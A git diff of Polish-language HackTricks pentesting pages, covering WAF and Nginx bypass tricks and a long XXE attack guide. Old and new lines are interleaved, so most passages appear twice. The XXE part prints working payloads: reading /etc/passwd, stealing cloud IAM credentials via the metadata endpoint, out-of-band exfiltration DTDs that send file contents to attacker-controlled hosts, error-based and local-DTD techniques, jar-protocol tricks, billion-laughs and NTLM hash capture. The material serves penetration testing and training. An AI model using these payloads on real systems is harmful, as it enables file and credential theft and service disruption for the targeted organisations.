| Wersja Nginx | **Znaki do obejścia w Spring Boot** |
| Wersja Nginx | **Znaki Bypass Spring Boot** |
| ------------- | --------------------------------- |
| 1.22.0 | `;` |
| 1.21.6 | `;` |
@ -77,7 +75,7 @@ include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx jest skonfigurowany tak, aby blokować dostęp do `/admin.php`, ale można to ominąć, uzyskując dostęp do `/admin.php/index.php`.
Nginx jest skonfigurowany tak, aby blokować dostęp do `/admin.php`, ale można to obejść, uzyskując dostęp do `/admin.php/index.php`.
### Jak zapobiec
```plaintext
@ -85,12 +83,12 @@ location ~* ^/admin {
deny all;
}
```
## Ominięcie Reguł Mod Security <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
## Ominięcie reguł Mod Security <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### Zagubienie Ścieżki
### Zagubienie ścieżki
[W tym poście](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) wyjaśniono, że ModSecurity v3 (do wersji 3.0.12) **nieprawidłowo zaimplementował zmienną `REQUEST_FILENAME`**, która miała zawierać ścieżkę dostępu (do początku parametrów). Spowodowane to było dekodowaniem adresu URL w celu uzyskania ścieżki.\
Dlatego też, żądanie takie jak `http://example.com/foo%3f';alert(1);foo=` w mod security będzie zakładać, że ścieżką jest tylko `/foo`, ponieważ `%3f` jest zamieniane na `?` kończąc ścieżkę URL, ale w rzeczywistości ścieżką, którą otrzyma serwer, będzie `/foo%3f';alert(1);foo=`.
Dlatego też, żądanie takie jak `http://example.com/foo%3f';alert(1);foo=` w mod security będzie zakładać, że ścieżką jest tylko `/foo`, ponieważ `%3f` jest zamieniane na `?` kończąc ścieżkę URL, ale faktyczna ścieżka, którą otrzyma serwer, będzie `/foo%3f';alert(1);foo=`.
Zmienne `REQUEST_BASENAME` i `PATH_INFO` również były dotknięte tym błędem.
@ -113,13 +111,13 @@ Connection: close\r\n
```
Było możliwe obejście AWS WAF, ponieważ nie rozumiał, że następna linia jest częścią wartości nagłówka, podczas gdy serwer NODEJS tak (to zostało naprawione).
## Referencje
## Odnośniki
* [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
* [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -133,6 +131,6 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
</details>

162
pentesting-web/xxe-xee-xml-external-entity.md
View file

@ -1,20 +1,20 @@
# XXE - XEE - Zewnętrzne Encje XML
# XXE - XEE - XML External Entity
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -22,21 +22,21 @@ Inne sposoby wsparcia HackTricks:
XML to język znaczników zaprojektowany do przechowywania i transportu danych, cechujący się elastyczną strukturą, która pozwala na użycie opisowo nazwanych tagów. Różni się od HTML-a tym, że nie jest ograniczony do zestawu predefiniowanych tagów. Znaczenie XML-a zmalało wraz z rozwojem JSON-a, pomimo początkowej roli w technologii AJAX.
* **Reprezentacja danych za pomocą Encji**: Encje w XML umożliwiają reprezentację danych, w tym znaków specjalnych takich jak `&lt;` i `&gt;`, które odpowiadają `<` i `>`, aby uniknąć konfliktu z systemem tagów XML-a.
* **Definiowanie Elementów XML**: XML pozwala na określenie typów elementów, określając, jak powinny być zbudowane elementy i jaką zawartość mogą zawierać, począwszy od dowolnego rodzaju zawartości po konkretne elementy podrzędne.
* **Definicja Typu Dokumentu (DTD)**: DTD są kluczowe w XML do określania struktury dokumentu i typów danych, które może zawierać. Mogą być wewnętrzne, zewnętrzne lub kombinacją obu, kierując formatowaniem i walidacją dokumentów.
* **Encje Niestandardowe i Zewnętrzne**: XML obsługuje tworzenie niestandardowych encji w DTD dla elastycznej reprezentacji danych. Zewnętrzne encje, zdefiniowane za pomocą adresu URL, budzą obawy dotyczące bezpieczeństwa, zwłaszcza w kontekście ataków zewnętrznych encji XML (XXE), które wykorzystują sposób, w jaki analizatory XML obsługują zewnętrzne źródła danych: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
* **Wykrywanie XXE za pomocą Encji Parametrowych**: Dla wykrywania podatności na XXE, zwłaszcza gdy metody konwencjonalne zawodzą ze względu na środki bezpieczeństwa analizatora, można wykorzystać encje parametrowe XML. Te encje pozwalają na techniki wykrywania poza pasmem, takie jak wywoływanie odpytywań DNS lub żądań HTTP do kontrolowanej domeny, w celu potwierdzenia podatności.
* **Reprezentacja danych za pomocą jednostek**: Jednostki w XML umożliwiają reprezentację danych, w tym znaków specjalnych takich jak `&lt;` i `&gt;`, które odpowiadają `<` i `>`, aby uniknąć konfliktu z systemem tagów XML-a.
* **Definiowanie elementów XML**: XML pozwala na określenie typów elementów, określając, jak powinny być zbudowane elementy i jaką zawartość mogą zawierać, począwszy od dowolnego rodzaju zawartości po konkretne elementy podrzędne.
* **Definicja typu dokumentu (DTD)**: DTD są kluczowe w XML do określania struktury dokumentu i typów danych, które może zawierać. Mogą być wewnętrzne, zewnętrzne lub kombinacją obu, kierując formatowaniem i walidacją dokumentów.
* **Jednostki niestandardowe i zewnętrzne**: XML obsługuje tworzenie niestandardowych jednostek w DTD do elastycznej reprezentacji danych. Jednostki zewnętrzne, zdefiniowane za pomocą adresu URL, budzą obawy dotyczące bezpieczeństwa, zwłaszcza w kontekście ataków zewnętrznych jednostek XML (XXE), które wykorzystują sposób, w jaki analizatory XML obsługują zewnętrzne źródła danych: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
* **Wykrywanie XXE za pomocą jednostek parametrowych**: Dla wykrywania podatności na XXE, zwłaszcza gdy konwencjonalne metody zawodzą ze względu na środki bezpieczeństwa analizatora, można wykorzystać jednostki parametrowe XML. Pozwalają one na techniki wykrywania poza pasmem, takie jak wywoływanie odpytywań DNS lub żądań HTTP do kontrolowanej domeny, w celu potwierdzenia podatności.
* `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
* `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
## Główne ataki
[**Większość tych ataków została przetestowana za pomocą niesamowitych laboratoriów XEE Portswiggers: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
[**Większość tych ataków została przetestowana za pomocą niesamowitych laboratoriów XEE firmy Portswiggers: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
### Nowy test Encji
### Nowe testowanie jednostki
W tym ataku sprawdzę, czy prosta deklaracja nowej ENCJI działa.
W tym ataku sprawdzę, czy prosta deklaracja nowej JEDNOSTKI działa
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
@ -45,7 +45,9 @@ W tym ataku sprawdzę, czy prosta deklaracja nowej ENCJI działa.
<storeId>1</storeId>
</stockCheck>
```
### Odczytaj plik
![](<../.gitbook/assets/image (867).png>)
### Odczyt pliku
Spróbujmy odczytać `/etc/passwd` w różny sposób. Dla systemu Windows możesz spróbować odczytać: `C:\windows\system32\drivers\etc\hosts`
@ -55,7 +57,7 @@ W tym pierwszym przypadku zauważ, że SYSTEM "_\*\*file:///\*\*etc/passwd_" ró
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
```
To drugi przypadek może być przydatny do wydobycia pliku, jeśli serwer internetowy używa PHP (Nie dotyczy to laboratoriów Portswiggers)
To drugi przypadek powinien być przydatny do wydobycia pliku, jeśli serwer internetowy używa PHP (Nie dotyczy to laboratoriów Portswiggers)
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
@ -73,6 +75,8 @@ W tym trzecim przypadku zauważamy, że deklarujemy `Element stockCheck` jako AN
<storeId>1</storeId>
</stockCheck3>
```
![](<../.gitbook/assets/image (750).png>)
### Lista katalogów
W aplikacjach opartych na **Java** może być możliwe **wyświetlenie zawartości katalogu** za pomocą XXE z ładunkiem takim jak (tylko pytanie o katalog zamiast pliku):
@ -91,19 +95,19 @@ XXE może być wykorzystane do nadużycia SSRF w chmurze
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
### Blind SSRF
### Ślepy SSRF
Korzystając z **wcześniej skomentowanej techniki** możesz sprawić, że serwer uzyska dostęp do serwera, który kontrolujesz, aby pokazać jego podatność. Ale jeśli to nie działa, być może dlatego, że **encje XML nie są dozwolone**, w takim przypadku możesz spróbować użyć **parametrów encji XML**:
Korzystając z **wcześniej skomentowanej techniki** możesz sprawić, że serwer uzyska dostęp do serwera, który kontrolujesz, aby pokazać jego podatność. Jeśli jednak to nie działa, być może dlatego, że **encje XML nie są dozwolone**, w takim przypadku można spróbować użyć **parametrów encji XML**:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### "Ślepy" SSRF - Wyprowadzanie danych poza pasmo
### "Ślepy" SSRF - Wyprowadzenie danych poza pasmem
**W tej sytuacji sprawimy, że serwer załaduje nowy DTD z złośliwym ładunkiem, który wyśle zawartość pliku za pomocą żądania HTTP (**dla plików wieloliniowych można spróbować wyprowadzić je za pomocą** _**ftp://**_ korzystając na przykład z tego podstawowego serwera [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). To wyjaśnienie oparte jest na** [**laboratorium Portswiggera tutaj**](https://portswigger.net/web-security/xxe/blind)**.**
**W tej sytuacji sprawimy, że serwer załaduje nowy DTD z złośliwym ładunkiem, który wyśle zawartość pliku za pomocą żądania HTTP (**dla **plików wieloliniowych można spróbować wyprowadzić je za pomocą** _**ftp://**_ korzystając na przykład z tego podstawowego serwera [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). Ta wyjaśnienie oparte jest na** [**laboratorium Portswiggera tutaj**](https://portswigger.net/web-security/xxe/blind)**.**
W podanym złośliwym DTD przeprowadzane są kroki w celu wyprowadzenia danych:
W podanym złośliwym DTD przeprowadzane są kroki mające na celu wyprowadzenie danych:
### Przykład złośliwego DTD:
```xml
@ -112,16 +116,16 @@ W podanym złośliwym DTD przeprowadzane są kroki w celu wyprowadzenia danych:
%eval;
%exfiltrate;
```
Kroki wykonywane przez ten DTD obejmują:
Kroki wykonane przez ten DTD obejmują:
1. **Definicja Encji Parametru:**
* Tworzona jest encja parametru XML, `%file`, czytająca zawartość pliku `/etc/hostname`.
1. **Definicja Encji Parametrów:**
* Utworzona jest encja parametru XML, `%file`, czytająca zawartość pliku `/etc/hostname`.
* Kolejna encja parametru XML, `%eval`, jest zdefiniowana. Dynamicznie deklaruje nową encję parametru XML, `%exfiltrate`. Encja `%exfiltrate` jest ustawiona do wysłania żądania HTTP do serwera atakującego, przekazując zawartość encji `%file` w ciągu zapytania URL.
2. **Wykonanie Encji:**
* Wykorzystywana jest encja `%eval`, prowadząc do wykonania dynamicznej deklaracji encji `%exfiltrate`.
* Wykorzystana jest encja `%eval`, prowadząc do wykonania dynamicznej deklaracji encji `%exfiltrate`.
* Następnie używana jest encja `%exfiltrate`, wywołując żądanie HTTP do określonego URL z zawartością pliku.
Atakujący hostuje ten złośliwy DTD na serwerze pod swoją kontrolą, zazwyczaj pod adresem URL takim jak `http://web-attacker.com/malicious.dtd`.
Atakujący hostuje ten złośliwy DTD na serwerze pod swoją kontrolą, zazwyczaj pod adresem URL `http://web-attacker.com/malicious.dtd`.
**Ładunek XXE:** Aby wykorzystać podatną aplikację, atakujący wysyła ładunek XXE:
```xml
@ -129,18 +133,16 @@ Atakujący hostuje ten złośliwy DTD na serwerze pod swoją kontrolą, zazwycza
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
Ten payload definiuje zmienną parametru XML `%xxe` i włącza ją w DTD. Po przetworzeniu przez analizator XML ten payload pobiera zewnętrzne DTD z serwera atakującego. Następnie analizator interpretuje DTD w linii, wykonując kroki określone w złośliwym DTD i prowadząc do wycieku pliku `/etc/hostname` do serwera atakującego.
### Oparty na Błędach (Zewnętrzny DTD)
### Błąd oparty na błędach (Zewnętrzne DTD)
**W tym przypadku sprawimy, że serwer załaduje złośliwe DTD, które pokaże zawartość pliku w komunikacie o błędzie (to jest ważne tylko jeśli możesz zobaczyć komunikaty o błędach).** [**Przykład stąd.**](https://portswigger.net/web-security/xxe/blind)
**W tym przypadku spowodujemy, że serwer załaduje złośliwy DTD, który pokaże zawartość pliku wewnątrz komunikatu o błędzie (to jest ważne tylko jeśli możesz zobaczyć komunikaty o błędach).** [**Przykład stąd.**](https://portswigger.net/web-security/xxe/blind)
Komunikat o błędzie analizy XML, ujawniający zawartość pliku `/etc/passwd`, może zostać wywołany za pomocą złośliwej zewnętrznej definicji typu dokumentu (DTD). Osiąga się to poprzez następujące kroki:
1. Zdefiniowana jest zmienna parametru XML o nazwie `file`, która zawiera zawartość pliku `/etc/passwd`.
2. Zdefiniowana jest zmienna parametru XML o nazwie `eval`, która zawiera dynamiczne zadeklarowanie innej zmiennej parametru XML o nazwie `error`. Ta zmienna `error`, gdy jest oceniana, próbuje załadować nieistniejący plik, włączając zawartość zmiennej `file` jako swoją nazwę.
3. Wywołana jest zmienna `eval`, prowadząc do dynamicznego zadeklarowania zmiennej `error`.
4. Wywołanie zmiennej `error` skutkuje próbą załadowania nieistniejącego pliku, co powoduje komunikat o błędzie zawierający zawartość pliku `/etc/passwd` jako część nazwy pliku.
1. Zdefiniowano zewnętrzną jednostkę parametru XML o nazwie `file`, która zawiera treść pliku `/etc/passwd`.
2. Zdefiniowano zewnętrzną jednostkę parametru XML o nazwie `eval`, która zawiera dynamiczne zadeklarowanie innej jednostki parametru XML o nazwie `error`. Ta jednostka `error`, gdy jest oceniana, próbuje załadować nieistniejący plik, włączając treść jednostki `file` jako swoją nazwę.
3. Wywołano jednostkę `eval`, co prowadzi do dynamicznego zadeklarowania jednostki `error`.
4. Wywołanie jednostki `error` skutkuje próbą załadowania nieistniejącego pliku, co powoduje komunikat o błędzie zawierający treść pliku `/etc/passwd` jako część nazwy pliku.
Złośliwe zewnętrzne DTD można wywołać za pomocą następującego XML:
```xml
@ -148,15 +150,15 @@ Złośliwe zewnętrzne DTD można wywołać za pomocą następującego XML:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
Po wykonaniu odpowiedź serwera WWW powinna zawierać komunikat o błędzie wyświetlający zawartość pliku `/etc/passwd`.
Po wykonaniu, odpowiedź serwera sieciowego powinna zawierać komunikat o błędzie wyświetlający zawartość pliku `/etc/passwd`.
![](<../.gitbook/assets/image (806).png>)
_**Należy zauważyć, że zewnętrzny DTD pozwala na umieszczenie jednej jednostki wewnątrz drugiej (****`eval`****), ale jest to zabronione wewnętrznym DTD. Dlatego nie można wymusić błędu bez użycia zewnętrznego DTD (zazwyczaj).**_
_**Proszę zauważyć, że zewnętrzny DTD pozwala na umieszczenie jednej jednostki wewnątrz drugiej (****`eval`****), ale jest to zabronione wewnętrznym DTD. Dlatego nie można wymusić błędu bez użycia zewnętrznego DTD (zazwyczaj).**_
### **Oparte na błędach (DTD systemowe)**
Co zatem z lukami w bezpieczeństwie XXE, gdy **blokowane są interakcje out-of-band** (zewnętrzne połączenia są niedostępne)?.
Co zatem z lukami w zabezpieczeniach XXE, gdy **blokowane są interakcje out-of-band** (zewnętrzne połączenia są niedostępne)?.
Luka w specyfikacji języka XML może **odsłonić poufne dane poprzez komunikaty o błędach, gdy DTD dokumentu łączy deklaracje wewnętrzne i zewnętrzne**. Ten problem pozwala na wewnętrzne ponowne zdefiniowanie jednostek zadeklarowanych zewnętrznie, ułatwiając wykonanie ataków XXE opartych na błędach. Takie ataki wykorzystują ponowne zdefiniowanie jednostki parametru XML, pierwotnie zadeklarowanej w zewnętrznym DTD, z wewnętrznego DTD. Gdy połączenia out-of-band są blokowane przez serwer, atakujący muszą polegać na lokalnych plikach DTD, aby przeprowadzić atak, mając na celu wywołanie błędu analizy w celu ujawnienia poufnych informacji.
@ -173,13 +175,13 @@ Rozważmy scenariusz, w którym system plików serwera zawiera plik DTD w lokali
%local_dtd;
]>
```
Kroki zarysowane są przez ten DTD:
Następujące kroki są wykonywane przez ten DTD:
* Definicja parametru XML o nazwie `local_dtd` obejmuje zewnętrzny plik DTD znajdujący się na systemie plików serwera.
* Następuje ponowne zdefiniowanie parametru XML `custom_entity`, pierwotnie zdefiniowanego w zewnętrznym DTD, aby otoczyć [exploit XXE oparty na błędach](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). To ponowne zdefiniowanie ma na celu wywołanie błędu analizy, ujawniając zawartość pliku `/etc/passwd`.
* Poprzez użycie parametru `local_dtd`, zaangażowany jest zewnętrzny DTD, obejmując nowo zdefiniowany `custom_entity`. Ta sekwencja działań powoduje wyemitowanie komunikatu błędu, który jest celem eksploatacji.
* Następuje ponowne zdefiniowanie parametru XML `custom_entity`, pierwotnie zdefiniowanego w zewnętrznym DTD, aby otoczyć [eksploit XXE oparty na błędach](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). To ponowne zdefiniowanie ma na celu wywołanie błędu analizy, ujawniając zawartość pliku `/etc/passwd`.
* Poprzez użycie parametru `local_dtd`, zaangażowany jest zewnętrzny DTD, obejmujący nowo zdefiniowany `custom_entity`. Ta sekwencja działań powoduje wyemitowanie komunikatu o błędzie, który jest celem eksploatacji.
**Przykład z życia rzeczywistego:** Systemy korzystające z środowiska pulpitu GNOME często posiadają DTD w lokalizacji `/usr/share/yelp/dtd/docbookx.dtd`, zawierający parametr o nazwie `ISOamso`.
**Przykład z życia wzięty:** Systemy korzystające z środowiska pulpitu GNOME często posiadają DTD w lokalizacji `/usr/share/yelp/dtd/docbookx.dtd`, zawierający parametr o nazwie `ISOamso`.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
@ -194,22 +196,24 @@ Kroki zarysowane są przez ten DTD:
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
Jak ta technika wykorzystuje **wewnętrzny DTD, musisz najpierw znaleźć ważny**. Możesz to zrobić, **instalując** ten sam **system operacyjny / oprogramowanie**, którego używa serwer, i **szukając niektórych domyślnych DTD**, lub **pobierając listę** domyślnych DTD w systemach i **sprawdzając**, czy którykolwiek z nich istnieje:
![](<../.gitbook/assets/image (622).png>)
Ponieważ ta technika wykorzystuje **wewnętrzny DTD, musisz najpierw znaleźć ważny**. Możesz to zrobić, **instalując** ten sam **system operacyjny / oprogramowanie**, którego używa serwer, i **szukając niektórych domyślnych DTD**, lub **pobierając listę** domyślnych DTD w systemach i **sprawdzając**, czy którykolwiek z nich istnieje:
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```
Dla dalszych informacji sprawdź [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
Aby uzyskać więcej informacji, sprawdź [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
### Znajdowanie DTDs w systemie
### Znajdowanie DTD w systemie
W następującym niesamowitym repozytorium github możesz znaleźć **ścieżki DTDs, które mogą być obecne w systemie**:
W następującym niesamowitym repozytorium github możesz znaleźć **ścieżki DTD, które mogą być obecne w systemie**:
{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
Co więcej, jeśli masz **obraz Dockera systemu ofiary**, możesz użyć narzędzia z tego samego repozytorium do **skanowania** **obrazu** i **znalezienia** ścieżki **DTDs** obecnych w systemie. Przeczytaj [Readme na githubie](https://github.com/GoSecure/dtd-finder), aby dowiedzieć się jak.
Co więcej, jeśli masz **obraz Dockera systemu ofiary**, możesz użyć narzędzia z tego samego repozytorium do **skanowania** **obrazu** i **znalezienia** ścieżki **DTD** obecnych w systemie. Przeczytaj [Readme na github](https://github.com/GoSecure/dtd-finder), aby dowiedzieć się jak.
```bash
java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar
@ -221,21 +225,21 @@ Testing 0 entities : []
[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : []
```
### XXE poprzez analizatory Office Open XML
### XXE za pomocą analizatorów Office Open XML
Dla bardziej szczegółowego wyjaśnienia tego ataku, **sprawdź drugą sekcję** [**tego niesamowitego posta**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **od Detectify**.
Możliwość **przesyłania dokumentów pakietu Microsoft Office jest oferowana przez wiele aplikacji internetowych**, które następnie przetwarzają pewne szczegóły z tych dokumentów. Na przykład aplikacja internetowa może pozwalać użytkownikom importować dane poprzez przesłanie arkusza kalkulacyjnego w formacie XLSX. Aby analizator mógł wydobyć dane z arkusza kalkulacyjnego, konieczne będzie przetworzenie co najmniej jednego pliku XML.
Możliwość **przesyłania dokumentów pakietu Microsoft Office jest oferowana przez wiele aplikacji internetowych**, które następnie przystępują do wyodrębniania pewnych szczegółów z tych dokumentów. Na przykład aplikacja internetowa może pozwalać użytkownikom importować dane poprzez przesłanie arkusza kalkulacyjnego w formacie XLSX. Aby analizator mógł wyodrębnić dane z arkusza kalkulacyjnego, konieczne będzie przeparsowanie co najmniej jednego pliku XML.
Aby przetestować tę podatność, konieczne jest utworzenie **pliku pakietu Microsoft Office zawierającego ładunek XXE**. Pierwszym krokiem jest utworzenie pustego katalogu, do którego można rozpakować dokument.
Po rozpakowaniu dokumentu, plik XML znajdujący się w `./unzipped/word/document.xml` powinien zostać otwarty i edytowany w preferowanym edytorze tekstu (np. vim). XML należy zmodyfikować, aby zawierał pożądany ładunek XXE, często zaczynając od żądania HTTP.
Po rozpakowaniu dokumentu, plik XML znajdujący się pod ścieżką `./unzipped/word/document.xml` powinien zostać otwarty i edytowany w preferowanym edytorze tekstu (np. vim). XML należy zmodyfikować, aby zawierał pożądany ładunek XXE, często zaczynając od żądania HTTP.
Zmodyfikowane linie XML należy wstawić między dwoma obiektami XML. Ważne jest, aby zastąpić adres URL adresem monitorowalnym dla żądań.
Zmodyfikowane linie XML należy wstawić między dwoma głównymi obiektami XML. Ważne jest zastąpienie adresu URL adresem URL do monitorowania żądań.
Wreszcie, plik można spakować, aby utworzyć złośliwy plik poc.docx. Z wcześniej utworzonego katalogu "unzipped" należy uruchomić następujące polecenie:
Teraz utworzony plik można przesłać do potencjalnie podatnej aplikacji internetowej, a można liczyć na pojawienie się żądania w dziennikach Burp Collaborator.
Teraz utworzony plik można przesłać do potencjalnie podatnej aplikacji internetowej, a można mieć nadzieję, że żądanie pojawi się w dziennikach Burp Collaborator.
### Protokół Jar:
@ -245,24 +249,24 @@ jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt
```
{% hint style="danger" %}
Aby móc uzyskać dostęp do plików wewnątrz plików PKZIP, **bardzo przydatne jest nadużycie XXE za pomocą plików DTD systemu.** Sprawdź [tę sekcję, aby dowiedzieć się, jak nadużywać pliki DTD systemu](xxe-xee-xml-external-entity.md#error-based-system-dtd).
Aby móc uzyskać dostęp do plików wewnątrz plików PKZIP, jest **bardzo przydatne do nadużywania XXE za pomocą plików DTD systemu.** Sprawdź [tę sekcję, aby dowiedzieć się, jak nadużywać pliki DTD systemu](xxe-xee-xml-external-entity.md#error-based-system-dtd).
{% endhint %}
Proces uzyskiwania dostępu do pliku w archiwum PKZIP za pomocą protokołu jar obejmuje kilka kroków:
1. Wysyłane jest żądanie HTTP w celu pobrania archiwum zip z określonego miejsca, takiego jak `https://download.website.com/archive.zip`.
2. Odpowiedź HTTP zawierająca archiwum jest tymczasowo przechowywana na systemie, zazwyczaj w lokalizacji takiej jak `/tmp/...`.
2. Odpowiedź HTTP zawierająca archiwum jest tymczasowo przechowywana w systemie, zazwyczaj w lokalizacji takiej jak `/tmp/...`.
3. Archiwum jest następnie rozpakowywane, aby uzyskać dostęp do jego zawartości.
4. Konkretny plik w archiwum, `file.zip`, jest odczytywany.
5. Po operacji, wszelkie tymczasowe pliki utworzone podczas tego procesu są usuwane.
5. Po zakończeniu operacji, wszystkie tymczasowe pliki utworzone podczas tego procesu są usuwane.
Interesującą techniką, aby przerwać ten proces na drugim kroku, jest utrzymywanie otwartej nieskończenie połączenia z serwerem podczas udostępniania pliku archiwum. Narzędzia dostępne w [tym repozytorium](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution) mogą być wykorzystane w tym celu, w tym serwer Pythona (`slow_http_server.py`) i serwer Java (`slowserver.jar`).
Interesującą techniką przerywania tego procesu na drugim kroku jest utrzymywanie otwartej nieskończenie połączenia serwera podczas obsługi pliku archiwum. Narzędzia dostępne w [tym repozytorium](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution) mogą być wykorzystane w tym celu, w tym serwer Pythona (`slow_http_server.py`) i serwer Javy (`slowserver.jar`).
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
<foo>&xxe;</foo>
```
{% hint style="danger" %}
Zapisywanie plików w katalogu tymczasowym może pomóc w **eskalacji innej podatności związanej z trawersowaniem ścieżki** (takiej jak lokalne dołączanie plików, wstrzykiwanie szablonów, XSLT RCE, deserializacja, itp).
Zapisywanie plików w katalogu tymczasowym może pomóc **eskalować inną podatność związaną z trawersowaniem ścieżek** (taką jak lokalne dołączanie plików, wstrzykiwanie szablonów, XSLT RCE, deserializacja, itp).
{% endhint %}
### XSS
@ -294,13 +298,13 @@ g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### Atak kwadratowego rozprężenia
#### Atak kwadratowego rozprzestrzeniania
![](<../.gitbook/assets/image (524).png>)
#### Pozyskiwanie NTML
Na hostach z systemem Windows można uzyskać skrót NTML użytkownika serwera sieciowego, ustawiając obsługę responder.py:
Na hostach Windows istnieje możliwość uzyskania skrótu NTML użytkownika serwera sieciowego poprzez ustawienie obsługi responder.py:
